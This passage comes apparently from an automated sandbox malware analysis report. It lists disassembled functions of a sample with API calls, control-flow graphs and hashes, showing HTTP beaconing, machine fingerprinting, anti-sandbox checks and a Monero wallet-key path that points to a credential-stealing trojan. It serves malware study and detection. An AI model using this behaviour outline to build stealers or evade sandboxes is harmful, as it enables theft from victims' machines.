                                  • GetProcAddress.KERNEL32(75BD0000,011E5730), ref: 0054A3CB
                                  • GetProcAddress.KERNEL32(75BD0000,011E5A70), ref: 0054A3E4
                                  • GetProcAddress.KERNEL32(75BD0000,011FD4B8), ref: 0054A3FC
                                  • GetProcAddress.KERNEL32(75BD0000,011FD428), ref: 0054A414
                                  • GetProcAddress.KERNEL32(75A70000,011E59B0), ref: 0054A436
                                  • GetProcAddress.KERNEL32(75A70000,011FD500), ref: 0054A44E
                                  • GetProcAddress.KERNEL32(75A70000,011FD410), ref: 0054A466
                                  • GetProcAddress.KERNEL32(75A70000,011FD3F8), ref: 0054A47F
                                  • GetProcAddress.KERNEL32(75A70000,011FD440), ref: 0054A497
                                  • GetProcAddress.KERNEL32(75450000,011E59F0), ref: 0054A4B8
                                  • GetProcAddress.KERNEL32(75450000,011E5850), ref: 0054A4D1
                                  • GetProcAddress.KERNEL32(75DA0000,011E56F0), ref: 0054A4F2
                                  • GetProcAddress.KERNEL32(75DA0000,011FD518), ref: 0054A50A
                                  • GetProcAddress.KERNEL32(6F070000,011E5A90), ref: 0054A530
                                  • GetProcAddress.KERNEL32(6F070000,011E5750), ref: 0054A548
                                  • GetProcAddress.KERNEL32(6F070000,011E5870), ref: 0054A560
                                  • GetProcAddress.KERNEL32(6F070000,011FD488), ref: 0054A579
                                  • GetProcAddress.KERNEL32(6F070000,011E5710), ref: 0054A591
                                  • GetProcAddress.KERNEL32(6F070000,011E58F0), ref: 0054A5A9
                                  • GetProcAddress.KERNEL32(6F070000,011E5790), ref: 0054A5C2
                                  • GetProcAddress.KERNEL32(6F070000,011E5910), ref: 0054A5DA
                                  • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0054A5F1
                                  • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0054A607
                                  • GetProcAddress.KERNEL32(75AF0000,011FCF60), ref: 0054A629
                                  • GetProcAddress.KERNEL32(75AF0000,011F9238), ref: 0054A641
                                  • GetProcAddress.KERNEL32(75AF0000,011FCE58), ref: 0054A659
                                  • GetProcAddress.KERNEL32(75AF0000,011FD098), ref: 0054A672
                                  • GetProcAddress.KERNEL32(75D90000,011E5990), ref: 0054A693
                                  • GetProcAddress.KERNEL32(6E170000,011FCE70), ref: 0054A6B4
                                  • GetProcAddress.KERNEL32(6E170000,011E57D0), ref: 0054A6CD
                                  • GetProcAddress.KERNEL32(6E170000,011FCF30), ref: 0054A6E5
                                  • GetProcAddress.KERNEL32(6E170000,011FD038), ref: 0054A6FD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                  • API String ID: 2238633743-1775429166
                                  • Opcode ID: b2d0457fa2cdfac15d777d53e72658d2535d67e25c2095e51b89258ea5a716ef
                                  • Instruction ID: 5b5370d95503858d226de9657413884d8740fa877a6c24a4989fd53db3d4235a
                                  • Opcode Fuzzy Hash: b2d0457fa2cdfac15d777d53e72658d2535d67e25c2095e51b89258ea5a716ef
                                  • Instruction Fuzzy Hash: EC624AB5504240BFE349DFA8ED8996E3BF9F7D8281714C51AA60DC3224D63D98C1CB9B
                                  Function 00536280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1033 536280-53630b call 54a7a0 call 5347b0 call 54a740 InternetOpenA StrCmpCA 1040 536314-536318 1033->1040 1041 53630d 1033->1041 1042 536509-536525 call 54a7a0 call 54a800 * 2 1040->1042 1043 53631e-536342 InternetConnectA 1040->1043 1041->1040 1062 536528-53652d 1042->1062 1045 536348-53634c 1043->1045 1046 5364ff-536503 InternetCloseHandle 1043->1046 1048 53635a 1045->1048 1049 53634e-536358 1045->1049 1046->1042 1051 536364-536392 HttpOpenRequestA 1048->1051 1049->1051 1052 5364f5-5364f9 InternetCloseHandle 1051->1052 1053 536398-53639c 1051->1053 1052->1046 1055 5363c5-536405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 53639e-5363bf InternetSetOptionA 1053->1056 1058 536407-536427 call 54a740 call 54a800 * 2 1055->1058 1059 53642c-53644b call 548940 1055->1059 1056->1055 1058->1062 1067 5364c9-5364e9 call 54a740 call 54a800 * 2 1059->1067 1068 53644d-536454 1059->1068 1067->1062 1071 5364c7-5364ef InternetCloseHandle 1068->1071 1072 536456-536480 InternetReadFile 1068->1072 1071->1052 1076 536482-536489 1072->1076 1077 53648b 1072->1077 1076->1077 1078 53648d-5364c5 call 54a9b0 call 54a8a0 call 54a800 1076->1078 1077->1071 1078->1072
                                  APIs
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                    • Part of subcall function 005347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00534839
                                    • Part of subcall function 005347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00534849
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  • InternetOpenA.WININET(00550DFE,00000001,00000000,00000000,00000000), ref: 005362E1
                                  • StrCmpCA.SHLWAPI(?,011FE878), ref: 00536303
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00536335
                                  • HttpOpenRequestA.WININET(00000000,GET,?,011FE158,00000000,00000000,00400100,00000000), ref: 00536385
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005363BF
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005363D1
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 005363FD
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0053646D
                                  • InternetCloseHandle.WININET(00000000), ref: 005364EF
                                  • InternetCloseHandle.WININET(00000000), ref: 005364F9
                                  • InternetCloseHandle.WININET(00000000), ref: 00536503
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3749127164-2509457195
                                  • Opcode ID: b4cc851dc2db513f4d839afb8a5662e8555eeaf355fa95a9c7f8641272598db2
                                  • Instruction ID: bb0a3a7bba7463fd5b88222dd9ab5b16b3aa01f21cd3e0c6c09f308cf2690119
                                  • Opcode Fuzzy Hash: b4cc851dc2db513f4d839afb8a5662e8555eeaf355fa95a9c7f8641272598db2
                                  • Instruction Fuzzy Hash: 3D714F71A40218BBEF24DFA0CC59BEE7B78FB84704F108559F5096B190DBB46A85CF51
                                  Function 00545510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1090 545510-545577 call 545ad0 call 54a820 * 3 call 54a740 * 4 1106 54557c-545583 1090->1106 1107 545585-5455b6 call 54a820 call 54a7a0 call 531590 call 5451f0 1106->1107 1108 5455d7-54564c call 54a740 * 2 call 531590 call 5452c0 call 54a8a0 call 54a800 call 54aad0 StrCmpCA 1106->1108 1124 5455bb-5455d2 call 54a8a0 call 54a800 1107->1124 1134 545693-5456a9 call 54aad0 StrCmpCA 1108->1134 1138 54564e-54568e call 54a7a0 call 531590 call 5451f0 call 54a8a0 call 54a800 1108->1138 1124->1134 1139 5457dc-545844 call 54a8a0 call 54a820 * 2 call 531670 call 54a800 * 4 call 546560 call 531550 1134->1139 1140 5456af-5456b6 1134->1140 1138->1134 1269 545ac3-545ac6 1139->1269 1142 5456bc-5456c3 1140->1142 1143 5457da-54585f call 54aad0 StrCmpCA 1140->1143 1146 5456c5-545719 call 54a820 call 54a7a0 call 531590 call 5451f0 call 54a8a0 call 54a800 1142->1146 1147 54571e-545793 call 54a740 * 2 call 531590 call 5452c0 call 54a8a0 call 54a800 call 54aad0 StrCmpCA 1142->1147 1162 545865-54586c 1143->1162 1163 545991-5459f9 call 54a8a0 call 54a820 * 2 call 531670 call 54a800 * 4 call 546560 call 531550 1143->1163 1146->1143 1147->1143 1246 545795-5457d5 call 54a7a0 call 531590 call 5451f0 call 54a8a0 call 54a800 1147->1246 1168 545872-545879 1162->1168 1169 54598f-545a14 call 54aad0 StrCmpCA 1162->1169 1163->1269 1176 5458d3-545948 call 54a740 * 2 call 531590 call 5452c0 call 54a8a0 call 54a800 call 54aad0 StrCmpCA 1168->1176 1177 54587b-5458ce call 54a820 call 54a7a0 call 531590 call 5451f0 call 54a8a0 call 54a800 1168->1177 1198 545a16-545a21 Sleep 1169->1198 1199 545a28-545a91 call 54a8a0 call 54a820 * 2 call 531670 call 54a800 * 4 call 546560 call 531550 1169->1199 1176->1169 1274 54594a-54598a call 54a7a0 call 531590 call 5451f0 call 54a8a0 call 54a800 1176->1274 1177->1169 1198->1106 1199->1269 1246->1143 1274->1169
                                  APIs
                                    • Part of subcall function 0054A820: lstrlen.KERNEL32(00534F05,?,?,00534F05,00550DDE), ref: 0054A82B
                                    • Part of subcall function 0054A820: lstrcpy.KERNEL32(00550DDE,00000000), ref: 0054A885
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00545644
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005456A1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00545857
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                    • Part of subcall function 005451F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00545228
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                    • Part of subcall function 005452C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00545318
                                    • Part of subcall function 005452C0: lstrlen.KERNEL32(00000000), ref: 0054532F
                                    • Part of subcall function 005452C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00545364
                                    • Part of subcall function 005452C0: lstrlen.KERNEL32(00000000), ref: 00545383
                                    • Part of subcall function 005452C0: lstrlen.KERNEL32(00000000), ref: 005453AE
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0054578B
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00545940
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00545A0C
                                  • Sleep.KERNEL32(0000EA60), ref: 00545A1B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleep
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 507064821-2791005934
                                  • Opcode ID: ccda7e235012f5134d19957334850e0f901c1fd62c03cd00c8d308697d1af856
                                  • Instruction ID: b9e6edb6b4af80d5ea3fa16d5cfa0df753b86076d981acc96414f4ff28acb546
                                  • Opcode Fuzzy Hash: ccda7e235012f5134d19957334850e0f901c1fd62c03cd00c8d308697d1af856
                                  • Instruction Fuzzy Hash: 7FE16172950105ABEB58FBB0DC5AEED7B38FFD4348F408128B40656096FF346A49CB96
                                  Function 005417A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1301 5417a0-5417cd call 54aad0 StrCmpCA 1304 5417d7-5417f1 call 54aad0 1301->1304 1305 5417cf-5417d1 ExitProcess 1301->1305 1309 5417f4-5417f8 1304->1309 1310 5419c2-5419cd call 54a800 1309->1310 1311 5417fe-541811 1309->1311 1313 541817-54181a 1311->1313 1314 54199e-5419bd 1311->1314 1315 541835-541844 call 54a820 1313->1315 1316 541970-541981 StrCmpCA 1313->1316 1317 5418f1-541902 StrCmpCA 1313->1317 1318 541951-541962 StrCmpCA 1313->1318 1319 541932-541943 StrCmpCA 1313->1319 1320 541913-541924 StrCmpCA 1313->1320 1321 54185d-54186e StrCmpCA 1313->1321 1322 54187f-541890 StrCmpCA 1313->1322 1323 541821-541830 call 54a820 1313->1323 1324 5418ad-5418be StrCmpCA 1313->1324 1325 5418cf-5418e0 StrCmpCA 1313->1325 1326 54198f-541999 call 54a820 1313->1326 1327 541849-541858 call 54a820 1313->1327 1314->1309 1315->1314 1332 541983-541986 1316->1332 1333 54198d 1316->1333 1346 541904-541907 1317->1346 1347 54190e 1317->1347 1329 541964-541967 1318->1329 1330 54196e 1318->1330 1350 541945-541948 1319->1350 1351 54194f 1319->1351 1348 541926-541929 1320->1348 1349 541930 1320->1349 1338 541870-541873 1321->1338 1339 54187a 1321->1339 1340 541892-54189c 1322->1340 1341 54189e-5418a1 1322->1341 1323->1314 1342 5418c0-5418c3 1324->1342 1343 5418ca 1324->1343 1344 5418e2-5418e5 1325->1344 1345 5418ec 1325->1345 1326->1314 1327->1314 1329->1330 1330->1314 1332->1333 1333->1314 1338->1339 1339->1314 1355 5418a8 1340->1355 1341->1355 1342->1343 1343->1314 1344->1345 1345->1314 1346->1347 1347->1314 1348->1349 1349->1314 1350->1351 1351->1314 1355->1314
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 005417C5
                                  • ExitProcess.KERNEL32 ref: 005417D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: 50ef8b2a1804f6da05c12e41ad20d43b011a4985e790ebfa58e8c5b9f7764d2e
                                  • Instruction ID: c30797fe23e81cfc9792d617efa63c4104e3e0a83dd09f59a119295cb0cc0889
                                  • Opcode Fuzzy Hash: 50ef8b2a1804f6da05c12e41ad20d43b011a4985e790ebfa58e8c5b9f7764d2e
                                  • Instruction Fuzzy Hash: DB515DB5B1420AEFDB04DFA0D964AFE7BB5BF44708F108449E806A7380D774E985CB66
                                  Function 00547500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1356 547500-54754a GetWindowsDirectoryA 1357 547553-5475c7 GetVolumeInformationA call 548d00 * 3 1356->1357 1358 54754c 1356->1358 1365 5475d8-5475df 1357->1365 1358->1357 1366 5475e1-5475fa call 548d00 1365->1366 1367 5475fc-547617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 547628-547658 wsprintfA call 54a740 1367->1369 1370 547619-547626 call 54a740 1367->1370 1377 54767e-54768e 1369->1377 1370->1377
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00547542
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0054757F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00547603
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0054760A
                                  • wsprintfA.USER32 ref: 00547640
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\$U
                                  • API String ID: 1544550907-2300784356
                                  • Opcode ID: a80a41eac952540994cd90d36f9b356af1db5bb95e2b6c809844715f3fcd9db8
                                  • Instruction ID: e9a5eb0ba440d63aee5ad2e715e4045a7fa63bc1ed137a7514023a2c4e734282
                                  • Opcode Fuzzy Hash: a80a41eac952540994cd90d36f9b356af1db5bb95e2b6c809844715f3fcd9db8
                                  • Instruction Fuzzy Hash: 234194B1D04248ABDF10DF94DC45BEEBBB8FF48708F104199F50967280D7786A84CBA5
                                  Function 005469F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011F2398), ref: 005498A1
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011F2338), ref: 005498BA
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011F2248), ref: 005498D2
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011F23C8), ref: 005498EA
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011F2458), ref: 00549903
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011F91E8), ref: 0054991B
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011E5C30), ref: 00549933
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011E5AD0), ref: 0054994C
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011F2470), ref: 00549964
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011F2488), ref: 0054997C
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011F22A8), ref: 00549995
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011F2260), ref: 005499AD
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011E5D10), ref: 005499C5
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011F2278), ref: 005499DE
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 005311D0: ExitProcess.KERNEL32 ref: 00531211
                                    • Part of subcall function 00531160: GetSystemInfo.KERNEL32(?), ref: 0053116A
                                    • Part of subcall function 00531160: ExitProcess.KERNEL32 ref: 0053117E
                                    • Part of subcall function 00531110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0053112B
                                    • Part of subcall function 00531110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00531132
                                    • Part of subcall function 00531110: ExitProcess.KERNEL32 ref: 00531143
                                    • Part of subcall function 00531220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0053123E
                                    • Part of subcall function 00531220: ExitProcess.KERNEL32 ref: 00531294
                                    • Part of subcall function 00546770: GetUserDefaultLangID.KERNEL32 ref: 00546774
                                    • Part of subcall function 00531190: ExitProcess.KERNEL32 ref: 005311C6
                                    • Part of subcall function 00547850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005311B7), ref: 00547880
                                    • Part of subcall function 00547850: RtlAllocateHeap.NTDLL(00000000), ref: 00547887
                                    • Part of subcall function 00547850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0054789F
                                    • Part of subcall function 005478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00547910
                                    • Part of subcall function 005478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00547917
                                    • Part of subcall function 005478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0054792F
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,011F92A8,?,0055110C,?,00000000,?,00551110,?,00000000,00550AEF), ref: 00546ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00546AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00546AF9
                                  • Sleep.KERNEL32(00001770), ref: 00546B04
                                  • CloseHandle.KERNEL32(?,00000000,?,011F92A8,?,0055110C,?,00000000,?,00551110,?,00000000,00550AEF), ref: 00546B1A
                                  • ExitProcess.KERNEL32 ref: 00546B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
